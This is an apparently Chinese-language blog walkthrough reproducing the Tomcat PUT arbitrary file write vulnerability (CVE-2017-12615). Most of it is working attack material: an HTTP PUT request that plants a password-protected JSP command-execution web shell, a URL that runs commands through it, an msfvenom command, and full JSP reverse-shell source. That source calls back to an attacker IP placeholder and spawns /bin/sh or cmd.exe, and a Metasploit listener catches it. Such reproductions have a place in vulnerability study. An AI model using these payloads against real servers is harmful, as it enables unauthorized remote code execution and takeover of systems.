Tomcat Put方法任意写文件漏洞(CVE-2017-12615)

2020-07-19

字数：516字 | 预计阅读时长：2分钟

背景

在运行Tomcat的主机上并且启用了HTTP PUT请求方法，readonly参数设置为false，攻击者能够将文件写入到服务器。Tomcat对文件后缀有一定检测（不能直接写jsp），但我们使用一些文件系统的特点来绕过了限制。Linux下可以使用“/”,Windows下可以使用“%20”

复现过程

发送如下payload

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

<%

    if("123456".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

        int a = -1;

        byte[] b = new byte[2048];

        out.print("<pre>");

        while((a=in.read(b))!=-1){

            out.println(new String(b));

        }

        out.print("</pre>");

    }

%>

返回201后便在网站目录下生成了1.jsp文件

访问shell

1	http://IP:8080/1.jsp?pwd=123456&i=whoami

也可以使用msf的jsp反弹shell

1	msfvenom -p java/jsp_shell_reverse_tcp LHOST=VPSIP LPORT=4444 R > cmd.jsp

生成cmd.jsp,将其内容put到服务器

%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream yw;
    OutputStream jz;

    StreamConnector( InputStream yw, OutputStream jz )
    {
      this.yw = yw;
      this.jz = jz;
    }

    public void run()
    {
      BufferedReader bx  = null;
      BufferedWriter dob = null;
      try
      {
        bx  = new BufferedReader( new InputStreamReader( this.yw ) );
        dob = new BufferedWriter( new OutputStreamWriter( this.jz ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = bx.read( buffer, 0, buffer.length ) ) > 0 )
        {
          dob.write( buffer, 0, length );
          dob.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( bx != null )
          bx.close();
        if( dob != null )
          dob.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}

    Socket socket = new Socket( "反弹IP", 4444 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

msf设置好监听

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

成功回连

参考链接

http://www.freebuf.com/vuls/148283.html

http://www.cnblogs.com/swyft/articles/5563732.html